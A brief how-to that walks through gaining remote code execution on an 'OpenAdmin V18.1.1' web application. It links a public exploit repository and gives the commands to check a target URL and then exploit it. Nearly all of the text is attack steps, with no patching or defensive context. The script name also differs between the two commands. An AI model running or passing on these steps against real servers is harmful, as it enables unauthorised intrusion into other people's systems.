How To Upload A Shell In OpenAdmin V18.1.1 (Authenticated)
OpenAdmin V18.1.1 has a vulnerability which we can exploit to get remote code execution.
- download the exploit from this Github Repository https://github.com/amriunix/ona-rce
python3 one-rce.py check FULL_PATH_URL_ONA, if you get ‘[+] The remote host is vulnerable!‘ then you can continue
python3 ona-rce.py exploit FULL_PATH_URL_ONA